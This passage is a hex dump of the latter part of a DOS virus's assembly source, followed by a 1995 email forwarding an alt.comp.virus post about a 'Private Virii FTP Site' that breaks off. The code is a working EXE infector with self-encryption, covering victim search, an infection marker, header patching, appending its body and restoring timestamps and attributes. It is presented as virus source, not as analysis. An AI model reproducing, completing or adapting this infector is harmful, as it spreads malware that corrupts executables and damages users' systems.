|00002210| 20 20 20 20 3b 20 53 65 | 61 72 63 68 65 73 20 66 | ; Se|arches f|
|00002220| 6f 72 20 76 69 63 74 69 | 6d 73 2e 0a 20 20 20 20 |or victi|ms.. |
|00002230| 20 20 20 20 6a 6e 7a 20 | 70 72 65 5f 67 65 74 5f | jnz |pre_get_|
|00002240| 6f 75 74 0a 20 20 20 20 | 20 20 20 20 63 6d 70 20 |out. | cmp |
|00002250| 62 79 74 65 20 70 74 72 | 20 64 73 3a 5b 62 78 2b |byte ptr| ds:[bx+|
|00002260| 32 5d 2c 27 58 27 0a 20 | 20 20 20 20 20 20 20 6a |2],'X'. | j|
|00002270| 6e 7a 20 70 72 65 5f 67 | 65 74 5f 6f 75 74 0a 20 |nz pre_g|et_out. |
|00002280| 20 20 20 20 20 20 20 63 | 6d 70 20 62 79 74 65 20 | c|mp byte |
|00002290| 70 74 72 20 64 73 3a 5b | 62 78 2b 33 5d 2c 27 45 |ptr ds:[|bx+3],'E|
|000022a0| 27 0a 20 20 20 20 20 20 | 20 20 6a 6e 7a 20 70 72 |'. | jnz pr|
|000022b0| 65 5f 67 65 74 5f 6f 75 | 74 0a 0a 0a 0a 0a 67 65 |e_get_ou|t.....ge|
|000022c0| 74 65 78 65 3a 0a 20 20 | 20 20 20 20 20 20 6d 6f |texe:. | mo|
|000022d0| 76 20 61 78 2c 34 33 30 | 30 68 0a 20 20 20 20 20 |v ax,430|0h. |
|000022e0| 20 20 20 63 61 6c 6c 20 | 64 6f 73 69 74 0a 0a 20 | call |dosit.. |
|000022f0| 20 20 20 20 20 20 20 6d | 6f 76 20 77 6f 72 64 20 | m|ov word |
|00002300| 70 74 72 20 63 73 3a 5b | 65 78 65 5f 61 74 74 72 |ptr cs:[|exe_attr|
|00002310| 69 62 2d 31 30 30 68 5d | 2c 63 78 0a 0a 20 20 20 |ib-100h]|,cx.. |
|00002320| 20 20 20 20 20 6d 6f 76 | 20 61 78 2c 34 33 30 31 | mov| ax,4301|
|00002330| 68 0a 20 20 20 20 20 20 | 20 20 78 6f 72 20 63 78 |h. | xor cx|
|00002340| 2c 63 78 0a 20 20 20 20 | 20 20 20 20 63 61 6c 6c |,cx. | call|
|00002350| 20 64 6f 73 69 74 0a 0a | 65 78 65 5f 6b 69 6c 6c | dosit..|exe_kill|
|00002360| 3a 0a 20 20 20 20 20 20 | 20 20 6d 6f 76 20 61 78 |:. | mov ax|
|00002370| 2c 33 64 30 32 68 0a 20 | 20 20 20 20 20 20 20 63 |,3d02h. | c|
|00002380| 61 6c 6c 20 64 6f 73 69 | 74 0a 20 20 20 20 20 20 |all dosi|t. |
|00002390| 20 20 78 63 68 67 20 62 | 78 2c 61 78 0a 0a 20 20 | xchg b|x,ax.. |
|000023a0| 20 20 20 20 20 20 6d 6f | 76 20 61 78 2c 35 37 30 | mo|v ax,570|
|000023b0| 30 68 0a 20 20 20 20 20 | 20 20 20 63 61 6c 6c 20 |0h. | call |
|000023c0| 64 6f 73 69 74 0a 0a 20 | 20 20 20 20 20 20 20 6d |dosit.. | m|
|000023d0| 6f 76 20 77 6f 72 64 20 | 70 74 72 20 63 73 3a 5b |ov word |ptr cs:[|
|000023e0| 74 69 6d 65 5f 73 74 61 | 6d 70 2d 31 30 30 68 5d |time_sta|mp-100h]|
|000023f0| 2c 63 78 0a 20 20 20 20 | 20 20 20 20 6d 6f 76 20 |,cx. | mov |
|00002400| 77 6f 72 64 20 70 74 72 | 20 63 73 3a 5b 64 61 74 |word ptr| cs:[dat|
|00002410| 65 5f 73 74 61 6d 70 2d | 31 30 30 68 5d 2c 64 78 |e_stamp-|100h],dx|
|00002420| 0a 0a 0a 0a 20 20 20 20 | 20 20 20 20 70 75 73 68 |.... | push|
|00002430| 20 63 73 0a 20 20 20 20 | 20 20 20 20 70 6f 70 20 | cs. | pop |
|00002440| 64 73 0a 0a 20 20 20 20 | 20 20 20 20 6d 6f 76 20 |ds.. | mov |
|00002450| 61 68 2c 33 66 68 0a 20 | 20 20 20 20 20 20 20 6d |ah,3fh. | m|
|00002460| 6f 76 20 63 78 2c 31 38 | 68 0a 20 20 20 20 20 20 |ov cx,18|h. |
|00002470| 20 20 6d 6f 76 20 64 78 | 2c 6f 66 66 73 65 74 20 | mov dx|,offset |
|00002480| 62 75 66 66 65 72 2d 31 | 30 30 68 0a 20 20 20 20 |buffer-1|00h. |
|00002490| 20 20 20 20 63 61 6c 6c | 20 64 6f 73 69 74 0a 0a | call| dosit..|
|000024a0| 20 20 20 20 20 20 20 20 | 63 6d 70 20 77 6f 72 64 | |cmp word|
|000024b0| 20 70 74 72 20 63 73 3a | 5b 62 75 66 66 65 72 2b | ptr cs:|[buffer+|
|000024c0| 31 32 68 2d 31 30 30 68 | 5d 2c 31 39 39 33 68 20 |12h-100h|],1993h |
|000024d0| 20 20 3b 20 4c 6f 6f 6b | 73 20 66 6f 72 20 76 69 | ; Look|s for vi|
|000024e0| 72 75 73 20 6d 61 72 6b | 65 72 0a 20 20 20 20 20 |rus mark|er. |
|000024f0| 20 20 20 6a 6e 7a 20 69 | 6e 66 65 63 74 66 6f 72 | jnz i|nfectfor|
|00002500| 73 75 72 65 20 20 20 20 | 20 20 20 20 20 20 20 20 |sure | |
|00002510| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 3b 20 20 | | ; |
|00002520| 20 6f 66 20 31 39 39 33 | 68 20 69 6e 20 2e 45 58 | of 1993|h in .EX|
|00002530| 45 0a 20 20 20 20 20 20 | 20 20 6a 6d 70 20 63 6c |E. | jmp cl|
|00002540| 6f 73 65 5f 69 74 20 20 | 20 20 20 20 20 20 20 20 |ose_it | |
|00002550| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002560| 20 20 20 20 3b 20 20 20 | 68 65 61 64 65 72 20 63 | ; |header c|
|00002570| 68 65 63 6b 73 75 6d 0a | 20 20 20 20 20 20 20 20 |hecksum.| |
|00002580| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002590| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000025a0| 20 20 20 20 20 20 20 20 | 20 20 3b 20 20 20 70 6f | | ; po|
|000025b0| 73 69 74 69 6f 6e 2e 0a | 69 6e 66 65 63 74 66 6f |sition..|infectfo|
|000025c0| 72 73 75 72 65 3a 0a 20 | 20 20 20 20 20 20 20 63 |rsure:. | c|
|000025d0| 61 6c 6c 20 6d 6f 76 65 | 5f 66 5f 70 74 72 66 61 |all move|_f_ptrfa|
|000025e0| 72 0a 0a 20 20 20 20 20 | 20 20 20 70 75 73 68 20 |r.. | push |
|000025f0| 61 78 0a 20 20 20 20 20 | 20 20 20 70 75 73 68 20 |ax. | push |
|00002600| 64 78 0a 0a 0a 20 20 20 | 20 20 20 20 20 63 61 6c |dx... | cal|
|00002610| 6c 20 73 74 6f 72 65 5f | 68 65 61 64 65 72 0a 0a |l store_|header..|
|00002620| 20 20 20 20 20 20 20 20 | 70 6f 70 20 64 78 0a 20 | |pop dx. |
|00002630| 20 20 20 20 20 20 20 70 | 6f 70 20 61 78 0a 0a 20 | p|op ax.. |
|00002640| 20 20 20 20 20 20 20 63 | 61 6c 6c 20 69 6e 66 65 | c|all infe|
|00002650| 63 74 5f 68 65 61 64 65 | 72 0a 0a 0a 20 20 20 20 |ct_heade|r... |
|00002660| 20 20 20 20 70 75 73 68 | 20 62 78 0a 20 20 20 20 | push| bx. |
|00002670| 20 20 20 20 70 75 73 68 | 20 63 78 0a 20 20 20 20 | push| cx. |
|00002680| 20 20 20 20 70 75 73 68 | 20 64 78 0a 0a 0a 20 20 | push| dx... |
|00002690| 20 20 20 20 20 20 6d 6f | 76 20 62 78 2c 6f 66 66 | mo|v bx,off|
|000026a0| 73 65 74 20 69 6e 66 65 | 63 74 5f 68 65 61 64 65 |set infe|ct_heade|
|000026b0| 72 2d 31 30 30 68 0a 20 | 20 20 20 20 20 20 20 6d |r-100h. | m|
|000026c0| 6f 76 20 63 78 2c 28 65 | 6e 64 63 72 79 70 74 29 |ov cx,(e|ndcrypt)|
|000026d0| 2d 28 69 6e 66 65 63 74 | 5f 68 65 61 64 65 72 29 |-(infect|_header)|
|000026e0| 0a 0a 72 6f 6c 5f 65 6d | 3a 20 20 20 20 20 20 20 |..rol_em|: |
|000026f0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002700| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002710| 20 20 20 20 3b 20 45 6e | 63 72 79 70 74 69 6f 6e | ; En|cryption|
|00002720| 20 76 69 61 0a 20 20 20 | 20 20 20 20 20 6d 6f 76 | via. | mov|
|00002730| 20 64 6c 2c 62 79 74 65 | 20 70 74 72 20 63 73 3a | dl,byte| ptr cs:|
|00002740| 5b 62 78 5d 20 20 20 20 | 20 20 20 20 20 20 20 20 |[bx] | |
|00002750| 20 20 20 20 20 20 20 3b | 20 20 20 72 6f 74 61 74 | ;| rotat|
|00002760| 69 6e 67 20 6c 65 66 74 | 2e 0a 20 20 20 20 20 20 |ing left|.. |
|00002770| 20 20 72 6f 6c 20 64 6c | 2c 31 0a 20 20 20 20 20 | rol dl|,1. |
|00002780| 20 20 20 6d 6f 76 20 62 | 79 74 65 20 70 74 72 20 | mov b|yte ptr |
|00002790| 63 73 3a 5b 62 78 5d 2c | 64 6c 0a 20 20 20 20 20 |cs:[bx],|dl. |
|000027a0| 20 20 20 69 6e 63 20 62 | 78 0a 20 20 20 20 20 20 | inc b|x. |
|000027b0| 20 20 6c 6f 6f 70 20 72 | 6f 6c 5f 65 6d 0a 0a 20 | loop r|ol_em.. |
|000027c0| 20 20 20 20 20 20 20 70 | 6f 70 20 64 78 0a 20 20 | p|op dx. |
|000027d0| 20 20 20 20 20 20 70 6f | 70 20 63 78 0a 20 20 20 | po|p cx. |
|000027e0| 20 20 20 20 20 70 6f 70 | 20 62 78 0a 0a 20 20 20 | pop| bx.. |
|000027f0| 20 20 20 20 20 6d 6f 76 | 20 61 68 2c 34 30 68 0a | mov| ah,40h.|
|00002800| 20 20 20 20 20 20 20 20 | 6d 6f 76 20 63 78 2c 65 | |mov cx,e|
|00002810| 6e 64 63 6f 64 65 2d 73 | 74 61 72 74 0a 20 20 20 |ndcode-s|tart. |
|00002820| 20 20 20 20 20 6d 6f 76 | 20 64 78 2c 6f 66 66 73 | mov| dx,offs|
|00002830| 65 74 20 73 74 61 72 74 | 2d 31 30 30 68 0a 20 20 |et start|-100h. |
|00002840| 20 20 20 20 20 20 63 61 | 6c 6c 20 64 6f 73 69 74 | ca|ll dosit|
|00002850| 0a 0a 0a 20 20 20 20 20 | 20 20 20 6d 6f 76 20 77 |... | mov w|
|00002860| 6f 72 64 20 70 74 72 20 | 63 73 3a 5b 62 75 66 66 |ord ptr |cs:[buff|
|00002870| 65 72 2b 31 32 68 2d 31 | 30 30 68 5d 2c 31 39 39 |er+12h-1|00h],199|
|00002880| 33 68 0a 0a 0a 20 20 20 | 20 20 20 20 20 63 61 6c |3h... | cal|
|00002890| 6c 20 6d 6f 76 65 5f 66 | 5f 70 74 72 63 6c 6f 73 |l move_f|_ptrclos|
|000028a0| 65 0a 0a 20 20 20 20 20 | 20 20 20 6d 6f 76 20 61 |e.. | mov a|
|000028b0| 68 2c 34 30 68 0a 20 20 | 20 20 20 20 20 20 6d 6f |h,40h. | mo|
|000028c0| 76 20 63 78 2c 31 38 68 | 0a 20 20 20 20 20 20 20 |v cx,18h|. |
|000028d0| 20 6d 6f 76 20 64 78 2c | 6f 66 66 73 65 74 20 62 | mov dx,|offset b|
|000028e0| 75 66 66 65 72 2d 31 30 | 30 68 0a 20 20 20 20 20 |uffer-10|0h. |
|000028f0| 20 20 20 63 61 6c 6c 20 | 64 6f 73 69 74 0a 0a 20 | call |dosit.. |
|00002900| 20 20 20 20 20 20 20 6d | 6f 76 20 61 78 2c 35 37 | m|ov ax,57|
|00002910| 30 31 68 0a 20 20 20 20 | 20 20 20 20 6d 6f 76 20 |01h. | mov |
|00002920| 63 78 2c 77 6f 72 64 20 | 70 74 72 20 63 73 3a 5b |cx,word |ptr cs:[|
|00002930| 74 69 6d 65 5f 73 74 61 | 6d 70 2d 31 30 30 68 5d |time_sta|mp-100h]|
|00002940| 0a 20 20 20 20 20 20 20 | 20 6d 6f 76 20 64 78 2c |. | mov dx,|
|00002950| 77 6f 72 64 20 70 74 72 | 20 63 73 3a 5b 64 61 74 |word ptr| cs:[dat|
|00002960| 65 5f 73 74 61 6d 70 2d | 31 30 30 68 5d 0a 20 20 |e_stamp-|100h]. |
|00002970| 20 20 20 20 20 20 63 61 | 6c 6c 20 64 6f 73 69 74 | ca|ll dosit|
|00002980| 0a 0a 63 6c 6f 73 65 5f | 69 74 3a 0a 0a 0a 20 20 |..close_|it:... |
|00002990| 20 20 20 20 20 20 6d 6f | 76 20 61 68 2c 33 65 68 | mo|v ah,3eh|
|000029a0| 0a 20 20 20 20 20 20 20 | 20 63 61 6c 6c 20 64 6f |. | call do|
|000029b0| 73 69 74 0a 0a 67 65 74 | 5f 6f 75 74 3a 0a 0a 0a |sit..get|_out:...|
|000029c0| 20 20 20 20 20 20 20 20 | 70 6f 70 20 64 73 0a 20 | |pop ds. |
|000029d0| 20 20 20 20 20 20 20 70 | 6f 70 20 64 78 0a 0a 73 | p|op dx..s|
|000029e0| 65 74 5f 61 74 74 72 69 | 62 3a 0a 20 20 20 20 20 |et_attri|b:. |
|000029f0| 20 20 20 6d 6f 76 20 61 | 78 2c 34 33 30 31 68 0a | mov a|x,4301h.|
|00002a00| 20 20 20 20 20 20 20 20 | 6d 6f 76 20 63 78 2c 77 | |mov cx,w|
|00002a10| 6f 72 64 20 70 74 72 20 | 63 73 3a 5b 65 78 65 5f |ord ptr |cs:[exe_|
|00002a20| 61 74 74 72 69 62 2d 31 | 30 30 68 5d 0a 20 20 20 |attrib-1|00h]. |
|00002a30| 20 20 20 20 20 63 61 6c | 6c 20 64 6f 73 69 74 0a | cal|l dosit.|
|00002a40| 0a 0a 20 20 20 20 20 20 | 20 20 70 6f 70 20 65 73 |.. | pop es|
|00002a50| 0a 20 20 20 20 20 20 20 | 20 70 6f 70 20 63 78 0a |. | pop cx.|
|00002a60| 20 20 20 20 20 20 20 20 | 70 6f 70 20 62 78 0a 20 | |pop bx. |
|00002a70| 20 20 20 20 20 20 20 70 | 6f 70 20 61 78 0a 0a 20 | p|op ax.. |
|00002a80| 20 20 20 20 20 20 20 72 | 65 74 6e 0a 0a 3b 2d 2d | r|etn..;--|
|00002a90| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002aa0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002ab0| 20 43 61 6c 6c 20 74 6f | 20 44 4f 53 20 69 6e 74 | Call to| DOS int|
|00002ac0| 20 32 31 68 20 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d | 21h ---|--------|
|00002ad0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 0a 0a 64 6f 73 69 |--------|--..dosi|
|00002ae0| 74 3a 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |t: | |
|00002af0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002b00| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 3b 20 | | ; |
|00002b10| 44 4f 53 20 66 75 6e 63 | 74 69 6f 6e 20 63 61 6c |DOS func|tion cal|
|00002b20| 6c 20 63 6f 64 65 2e 0a | 20 20 20 20 20 20 20 20 |l code..| |
|00002b30| 70 75 73 68 66 0a 20 20 | 20 20 20 20 20 20 63 61 |pushf. | ca|
|00002b40| 6c 6c 20 64 77 6f 72 64 | 20 70 74 72 20 63 73 3a |ll dword| ptr cs:|
|00002b50| 5b 64 6f 73 5f 76 65 63 | 74 6f 72 2d 31 30 30 68 |[dos_vec|tor-100h|
|00002b60| 5d 0a 20 20 20 20 20 20 | 20 20 72 65 74 6e 0a 0a |]. | retn..|
|00002b70| 3b 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |;-------|--------|
|00002b80| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002b90| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002ba0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002bb0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 0a 0a 0a |--------|-----...|
|00002bc0| 0a 0a 0a 0a 0a 0a 0a 0a | 3b 2d 2d 2d 2d 2d 2d 2d |........|;-------|
|00002bd0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002be0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 20 53 74 6f 72 65 20 |--------|- Store |
|00002bf0| 48 65 61 64 65 72 20 2d | 2d 2d 2d 2d 2d 2d 2d 2d |Header -|--------|
|00002c00| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002c10| 2d 2d 2d 2d 0a 0a 73 74 | 6f 72 65 5f 68 65 61 64 |----..st|ore_head|
|00002c20| 65 72 3a 0a 20 20 20 20 | 20 20 20 20 6c 65 73 20 |er:. | les |
|00002c30| 20 61 78 2c 20 64 77 6f | 72 64 20 70 74 72 20 5b | ax, dwo|rd ptr [|
|00002c40| 62 75 66 66 65 72 2b 31 | 34 68 2d 31 30 30 68 5d |buffer+1|4h-100h]|
|00002c50| 20 20 20 20 20 20 3b 20 | 53 61 76 65 20 6f 6c 64 | ; |Save old|
|00002c60| 20 65 6e 74 72 79 20 70 | 6f 69 6e 74 0a 20 20 20 | entry p|oint. |
|00002c70| 20 20 20 20 20 6d 6f 76 | 20 20 77 6f 72 64 20 70 | mov| word p|
|00002c80| 74 72 20 5b 4f 72 69 67 | 43 53 49 50 2d 31 30 30 |tr [Orig|CSIP-100|
|00002c90| 68 5d 2c 20 61 78 0a 20 | 20 20 20 20 20 20 20 6d |h], ax. | m|
|00002ca0| 6f 76 20 20 77 6f 72 64 | 20 70 74 72 20 5b 4f 72 |ov word| ptr [Or|
|00002cb0| 69 67 43 53 49 50 2b 32 | 2d 31 30 30 68 5d 2c 20 |igCSIP+2|-100h], |
|00002cc0| 65 73 0a 0a 20 20 20 20 | 20 20 20 20 6c 65 73 20 |es.. | les |
|00002cd0| 20 61 78 2c 20 64 77 6f | 72 64 20 70 74 72 20 5b | ax, dwo|rd ptr [|
|00002ce0| 62 75 66 66 65 72 2b 30 | 45 68 2d 31 30 30 68 5d |buffer+0|Eh-100h]|
|00002cf0| 20 20 20 20 20 20 3b 20 | 53 61 76 65 20 6f 6c 64 | ; |Save old|
|00002d00| 20 73 74 61 63 6b 0a 20 | 20 20 20 20 20 20 20 6d | stack. | m|
|00002d10| 6f 76 20 20 77 6f 72 64 | 20 70 74 72 20 5b 4f 72 |ov word| ptr [Or|
|00002d20| 69 67 53 53 53 50 2d 31 | 30 30 68 5d 2c 20 65 73 |igSSSP-1|00h], es|
|00002d30| 0a 20 20 20 20 20 20 20 | 20 6d 6f 76 20 20 77 6f |. | mov wo|
|00002d40| 72 64 20 70 74 72 20 5b | 4f 72 69 67 53 53 53 50 |rd ptr [|OrigSSSP|
|00002d50| 2b 32 2d 31 30 30 68 5d | 2c 20 61 78 0a 0a 20 20 |+2-100h]|, ax.. |
|00002d60| 20 20 20 20 20 20 72 65 | 74 6e 0a 0a 3b 2d 2d 2d | re|tn..;---|
|00002d70| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002d80| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002d90| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002da0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002db0| 2d 2d 2d 2d 2d 2d 2d 2d | 0a 0a 0a 0a 0a 0a 0a 3b |--------|.......;|
|00002dc0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002dd0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002de0| 2d 2d 20 53 65 74 20 66 | 69 6c 65 20 70 6f 69 6e |-- Set f|ile poin|
|00002df0| 74 65 72 20 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |ter ----|--------|
|00002e00| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 0a 0a 6d 6f |--------|----..mo|
|00002e10| 76 65 5f 66 5f 70 74 72 | 66 61 72 3a 20 20 20 20 |ve_f_ptr|far: |
|00002e20| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002e30| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002e40| 3b 20 43 6f 64 65 20 74 | 6f 20 6d 6f 76 65 20 66 |; Code t|o move f|
|00002e50| 69 6c 65 20 70 6f 69 6e | 74 65 72 2e 0a 20 20 20 |ile poin|ter.. |
|00002e60| 20 20 20 20 20 6d 6f 76 | 20 61 78 2c 34 32 30 32 | mov| ax,4202|
|00002e70| 68 0a 20 20 20 20 20 20 | 20 20 6a 6d 70 20 73 68 |h. | jmp sh|
|00002e80| 6f 72 74 20 6d 6f 76 65 | 5f 66 0a 0a 6d 6f 76 65 |ort move|_f..move|
|00002e90| 5f 66 5f 70 74 72 63 6c | 6f 73 65 3a 0a 20 20 20 |_f_ptrcl|ose:. |
|00002ea0| 20 20 20 20 20 6d 6f 76 | 20 61 78 2c 34 32 30 30 | mov| ax,4200|
|00002eb0| 68 0a 0a 6d 6f 76 65 5f | 66 3a 0a 20 20 20 20 20 |h..move_|f:. |
|00002ec0| 20 20 20 78 6f 72 20 64 | 78 2c 64 78 0a 20 20 20 | xor d|x,dx. |
|00002ed0| 20 20 20 20 20 78 6f 72 | 20 63 78 2c 63 78 0a 20 | xor| cx,cx. |
|00002ee0| 20 20 20 20 20 20 20 63 | 61 6c 6c 20 64 6f 73 69 | c|all dosi|
|00002ef0| 74 0a 20 20 20 20 20 20 | 20 20 72 65 74 6e 0a 0a |t. | retn..|
|00002f00| 3b 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |;-------|--------|
|00002f10| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002f20| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002f30| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002f40| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 0a 0a 0a |--------|-----...|
|00002f50| 65 6e 64 63 6f 64 65 20 | 20 20 20 20 20 20 20 20 |endcode | |
|00002f60| 6c 61 62 65 6c 20 20 20 | 20 20 20 20 62 79 74 65 |label | byte|
|00002f70| 0a 0a 65 6e 64 70 0a 0a | 63 6f 64 65 20 65 6e 64 |..endp..|code end|
|00002f80| 73 0a 65 6e 64 20 20 73 | 74 61 72 74 0a 0a 46 72 |s.end s|tart..Fr|
|00002f90| 6f 6d 20 73 6d 74 70 20 | 46 72 69 20 4a 61 6e 20 |om smtp |Fri Jan |
|00002fa0| 32 37 20 31 33 3a 32 33 | 20 45 53 54 20 31 39 39 |27 13:23| EST 199|
|00002fb0| 35 0a 52 65 63 65 69 76 | 65 64 3a 20 66 72 6f 6d |5.Receiv|ed: from|
|00002fc0| 20 69 64 73 2e 6e 65 74 | 20 62 79 20 50 4f 42 4f | ids.net| by POBO|
|00002fd0| 58 2e 6a 77 75 2e 65 64 | 75 3b 20 46 72 69 2c 20 |X.jwu.ed|u; Fri, |
|00002fe0| 32 37 20 4a 61 6e 20 39 | 35 20 31 33 3a 32 33 20 |27 Jan 9|5 13:23 |
|00002ff0| 45 53 54 0a 44 61 74 65 | 3a 20 46 72 69 2c 20 32 |EST.Date|: Fri, 2|
|00003000| 37 20 4a 61 6e 20 31 39 | 39 35 20 31 33 3a 32 31 |7 Jan 19|95 13:21|
|00003010| 3a 33 38 20 2d 30 35 30 | 30 20 28 45 53 54 29 0a |:38 -050|0 (EST).|
|00003020| 46 72 6f 6d 3a 20 69 64 | 73 2e 6e 65 74 21 4a 4f |From: id|s.net!JO|
|00003030| 53 48 55 41 57 20 28 4a | 4f 53 48 55 41 57 29 0a |SHUAW (J|OSHUAW).|
|00003040| 54 6f 3a 20 70 6f 62 6f | 78 2e 6a 77 75 2e 65 64 |To: pobo|x.jwu.ed|
|00003050| 75 21 6a 6f 73 68 75 61 | 77 20 0a 43 6f 6e 74 65 |u!joshua|w .Conte|
|00003060| 6e 74 2d 4c 65 6e 67 74 | 68 3a 20 31 31 37 39 0a |nt-Lengt|h: 1179.|
|00003070| 43 6f 6e 74 65 6e 74 2d | 54 79 70 65 3a 20 62 69 |Content-|Type: bi|
|00003080| 6e 61 72 79 0a 4d 65 73 | 73 61 67 65 2d 49 64 3a |nary.Mes|sage-Id:|
|00003090| 20 3c 39 35 30 31 32 37 | 31 33 32 31 33 38 2e 62 | <950127|132138.b|
|000030a0| 35 32 62 40 69 64 73 2e | 6e 65 74 3e 0a 53 74 61 |52b@ids.|net>.Sta|
|000030b0| 74 75 73 3a 20 52 4f 0a | 0a 54 6f 3a 20 6a 6f 73 |tus: RO.|.To: jos|
|000030c0| 68 75 61 77 40 70 6f 62 | 6f 78 2e 6a 77 75 2e 65 |huaw@pob|ox.jwu.e|
|000030d0| 64 75 0a 53 75 62 6a 65 | 63 74 3a 20 28 66 77 64 |du.Subje|ct: (fwd|
|000030e0| 29 20 50 72 69 76 61 74 | 65 20 56 69 72 69 69 20 |) Privat|e Virii |
|000030f0| 46 54 50 20 53 69 74 65 | 0a 4e 65 77 73 67 72 6f |FTP Site|.Newsgro|
|00003100| 75 70 73 3a 20 61 6c 74 | 2e 63 6f 6d 70 2e 76 69 |ups: alt|.comp.vi|
|00003110| 72 75 73 0a 0a 50 61 74 | 68 3a 20 70 61 70 65 72 |rus..Pat|h: paper|
|00003120| 62 6f 79 2e 69 64 73 2e | 6e 65 74 21 75 75 6e 65 |boy.ids.|net!uune|
|00003130| 74 21 6e 6e 74 70 2e 63 | 72 6c 2e 63 6f 6d 21 63 |t!nntp.c|rl.com!c|
|00003140| 72 6c 31 32 2e 63 72 6c | 2e 63 6f 6d 21 6e 6f 74 |rl12.crl|.com!not|
|00003150| 2d 66 6f 72 2d 6d 61 69 | 6c 0a 46 72 6f 6d 3a 20 |-for-mai|l.From: |
|00003160| 79 6f 6a 69 6d 62 6f 40 | 63 72 6c 2e 63 6f 6d 20 |yojimbo@|crl.com |
|00003170| 28 44 6f 75 67 6c 61 73 | 20 4d 61 75 6c 64 69 6e |(Douglas| Mauldin|
|00003180| 29 0a 4e 65 77 73 67 72 | 6f 75 70 73 3a 20 61 6c |).Newsgr|oups: al|
|00003190| 74 2e 63 6f 6d 70 2e 76 | 69 72 75 73 0a 53 75 62 |t.comp.v|irus.Sub|
|000031a0| 6a 65 63 74 3a 20 50 72 | 69 76 61 74 65 20 56 69 |ject: Pr|ivate Vi|
|000031b0| 72 69 69 20 46 54 50 20 | 53 69 74 65 0a 44 61 74 |rii FTP |Site.Dat|
|000031c0| 65 3a 20 32 34 20 4a 61 | 6e 20 31 39 39 35 20 32 |e: 24 Ja|n 1995 2|
|000031d0| 32 3a 30 31 3a 35 33 20 | 2d 30 38 30 30 0a 4f 72 |2:01:53 |-0800.Or|
|000031e0| 67 61 6e 69 7a 61 74 69 | 6f 6e 3a 20 43 52 4c 20 |ganizati|on: CRL |
|000031f0| 44 69 61 6c 75 70 20 49 | 6e 74 65 72 6e 65 74 20 |Dialup I|nternet |
|00003200| 41 63 63 65 73 73 09 28 | 34 31 35 29 20 37 30 35 |Access.(|415) 705|
|00003210| 2d 36 30 36 30 20 20 5b | 4c 6f 67 69 6e 3a 20 67 |-6060 [|Login: g|
|00003220| 75 65 73 74 5d 0a 4c 69 | 6e 65 73 3a 20 31 34 0a |uest].Li|nes: 14.|
|00003230| 4d 65 73 73 61 67 65 2d | 49 44 3a 20 3c 33 67 34 |Message-|ID: <3g4|
|00003240| 70 67 68 24 6b 61 32 40 | 63 72 6c 31 32 2e 63 72 |pgh$ka2@|crl12.cr|
|00003250| 6c 2e 63 6f 6d 3e 0a 4e | 4e 54 50 2d 50 6f 73 74 |l.com>.N|NTP-Post|
|00003260| 69 6e 67 2d 48 6f 73 74 | 3a 20 63 72 6c 31 32 2e |ing-Host|: crl12.|
|00003270| 63 72 6c 2e 63 6f 6d 0a | 58 2d 4e 65 77 73 72 65 |crl.com.|X-Newsre|
|00003280| 61 64 65 72 3a 20 54 49 | 4e 20 5b 76 65 72 73 69 |ader: TI|N [versi|
|00003290| 6f 6e 20 31 2e 32 20 50 | 4c 32 5d 0a 0a 49 20 72 |on 1.2 P|L2]..I r|
|000032a0| 75 6e 20 54 48 65 20 51 | 55 61 52 61 4e 54 69 4e |un THe Q|UaRaNTiN|
